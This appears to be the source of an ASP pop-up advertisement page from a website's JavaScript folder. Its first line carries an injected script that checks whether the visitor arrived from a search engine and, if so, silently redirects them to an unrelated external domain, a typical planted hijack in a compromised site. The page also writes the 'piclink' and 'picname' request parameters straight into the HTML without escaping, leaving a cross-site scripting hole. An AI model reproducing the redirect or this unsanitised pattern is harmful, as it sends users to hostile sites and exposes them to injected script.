d:\wwwroot\wuchunhua\js\pop.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><html>
002:
<head>
003:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
004:
<title>µ¯³ö¹ã¸æ</title>
005:
</head>
006:
<body leftmargin="0" topmargin="0">
007:
<%
picname=request("picname")
%
>
008:
<div style='position: absolute;cursor:hand' onclick=window.open('
<%
=request("piclink")
%
>','_blank')>
009:
<%
if lcase(right(picname,3))="swf" then
%
><embed src='../adpic/
<%
=picname
%
>' width=400 height=300 quality='high' pluginspage='http://www.macromedia.com/go/getflashplayer' type='application/x-shockwave-flash' wmode='transparent' scale='noborder'></embed>
<%
else
%
><img src=../adpic/
<%
=picname
%
> width=400 height=300 border=0>
<%
end if
%
>
010:
</div>
011:
</body>
012:
</html>
013:
014:
015: